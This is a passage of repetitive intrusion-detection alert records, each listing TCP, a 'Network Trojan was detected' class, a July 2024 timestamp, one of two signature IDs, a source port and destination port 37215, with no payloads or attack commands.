                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824394
                  SID:2829579
                  Source Port:54806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2829579
                  Source Port:44494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2829579
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2829579
                  Source Port:36320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.684661
                  SID:2835222
                  Source Port:60358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.436580
                  SID:2835222
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2829579
                  Source Port:46162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969206
                  SID:2835222
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.764687
                  SID:2829579
                  Source Port:60370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484903
                  SID:2835222
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2829579
                  Source Port:49620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2829579
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.335030
                  SID:2829579
                  Source Port:55046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.483673
                  SID:2835222
                  Source Port:57334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622082
                  SID:2829579
                  Source Port:58798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102148
                  SID:2829579
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.319330
                  SID:2829579
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2829579
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2835222
                  Source Port:37798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869114
                  SID:2835222
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2835222
                  Source Port:33348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2829579
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355415
                  SID:2829579
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2835222
                  Source Port:47384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2829579
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901801
                  SID:2835222
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2835222
                  Source Port:51650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596557
                  SID:2829579
                  Source Port:56226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2829579
                  Source Port:50764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2829579
                  Source Port:34900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2835222
                  Source Port:34436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2829579
                  Source Port:46866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2835222
                  Source Port:47040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.777925
                  SID:2829579
                  Source Port:59312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2829579
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2835222
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.819224
                  SID:2829579
                  Source Port:39206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2835222
                  Source Port:58930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478787
                  SID:2835222
                  Source Port:59248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2835222
                  Source Port:40612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.937282
                  SID:2829579
                  Source Port:42466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170631
                  SID:2829579
                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2829579
                  Source Port:59234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151906
                  SID:2835222
                  Source Port:49100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2835222
                  Source Port:43000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2835222
                  Source Port:59182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.079428
                  SID:2835222
                  Source Port:50314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624082
                  SID:2835222
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.167098
                  SID:2835222
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2829579
                  Source Port:58624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2829579
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011979
                  SID:2829579
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852643
                  SID:2835222
                  Source Port:55654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2835222
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2835222
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2829579
                  Source Port:45112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2835222
                  Source Port:37760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:59652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2829579
                  Source Port:46820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840921
                  SID:2835222
                  Source Port:52772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.354961
                  SID:2835222
                  Source Port:47046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2835222
                  Source Port:52780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412517
                  SID:2829579
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529525
                  SID:2829579
                  Source Port:47048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2835222
                  Source Port:44034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615140
                  SID:2829579
                  Source Port:41058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2829579
                  Source Port:60858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.114330
                  SID:2835222
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.480250
                  SID:2835222
                  Source Port:60240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942132
                  SID:2835222
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2835222
                  Source Port:57780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433898
                  SID:2835222
                  Source Port:41760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.887836
                  SID:2835222
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2829579
                  Source Port:59410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.313127
                  SID:2835222
                  Source Port:45204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988917
                  SID:2829579
                  Source Port:58486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228280
                  SID:2829579
                  Source Port:54676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2829579
                  Source Port:43628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.579530
                  SID:2829579
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2829579
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2829579
                  Source Port:58724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983533
                  SID:2835222
                  Source Port:58912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.976199
                  SID:2829579
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2835222
                  Source Port:35238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2829579
                  Source Port:39692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2835222
                  Source Port:43700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.621748
                  SID:2835222
                  Source Port:33176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603298
                  SID:2829579
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2835222
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2829579
                  Source Port:42226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2835222
                  Source Port:34218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2835222
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230941
                  SID:2835222
                  Source Port:46584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2829579
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2829579
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900163
                  SID:2835222
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2835222
                  Source Port:51992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2835222
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883548
                  SID:2829579
                  Source Port:43678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982292
                  SID:2829579
                  Source Port:47490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.353550
                  SID:2829579
                  Source Port:49112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2829579
                  Source Port:42812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.588924
                  SID:2835222
                  Source Port:38108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.422922
                  SID:2835222
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098098
                  SID:2829579
                  Source Port:51656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2829579
                  Source Port:45734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.622039
                  SID:2835222
                  Source Port:36914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2835222
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921698
                  SID:2829579
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2829579
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281764
                  SID:2829579
                  Source Port:47558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.727335
                  SID:2835222
                  Source Port:43214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856622
                  SID:2829579
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.919552
                  SID:2829579
                  Source Port:38124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2829579
                  Source Port:48332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.094211
                  SID:2829579
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2835222
                  Source Port:36898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538879
                  SID:2829579
                  Source Port:38400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.352248
                  SID:2829579
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.891587
                  SID:2829579
                  Source Port:41350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.337893
                  SID:2835222
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2835222
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2835222
                  Source Port:58974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2829579
                  Source Port:37472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541928
                  SID:2829579
                  Source Port:54706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2829579
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.209448
                  SID:2829579
                  Source Port:57862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2835222
                  Source Port:43638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.946996
                  SID:2829579
                  Source Port:49696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2829579
                  Source Port:38728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2835222
                  Source Port:38126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2835222
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2835222
                  Source Port:45094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.485790
                  SID:2829579
                  Source Port:53386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.540694
                  SID:2835222
                  Source Port:46488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2835222
                  Source Port:53988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.821987
                  SID:2829579
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757689
                  SID:2829579
                  Source Port:42168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077198
                  SID:2829579
                  Source Port:54504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356942
                  SID:2829579
                  Source Port:45044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2829579
                  Source Port:54206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138927
                  SID:2829579
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2829579
                  Source Port:54426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.852071
                  SID:2835222
                  Source Port:40334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2835222
                  Source Port:37986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.266829
                  SID:2835222
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2835222
                  Source Port:40234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2829579
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.406016
                  SID:2829579
                  Source Port:32982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.870482
                  SID:2829579
                  Source Port:55522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2829579
                  Source Port:58628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2835222
                  Source Port:53520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896757
                  SID:2835222
                  Source Port:55446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:40310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593118
                  SID:2835222
                  Source Port:54546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.694603
                  SID:2829579
                  Source Port:54874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2835222
                  Source Port:34986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866292
                  SID:2835222
                  Source Port:33786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028989
                  SID:2829579
                  Source Port:54406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.520470
                  SID:2835222
                  Source Port:55230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:56062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.912593
                  SID:2835222
                  Source Port:36480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2835222
                  Source Port:55086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807488
                  SID:2835222
                  Source Port:44978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.102730
                  SID:2829579
                  Source Port:34868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2835222
                  Source Port:58152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152131
                  SID:2829579
                  Source Port:38452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237564
                  SID:2829579
                  Source Port:41282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2829579
                  Source Port:45526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2829579
                  Source Port:55970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.228367
                  SID:2829579
                  Source Port:55532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2835222
                  Source Port:50848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.854070
                  SID:2835222
                  Source Port:50238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822154
                  SID:2829579
                  Source Port:56432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2835222
                  Source Port:51974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.156956
                  SID:2835222
                  Source Port:47300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858486
                  SID:2829579
                  Source Port:38286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.863789
                  SID:2835222
                  Source Port:42676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.698988
                  SID:2835222
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:50082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.475072
                  SID:2829579
                  Source Port:55202
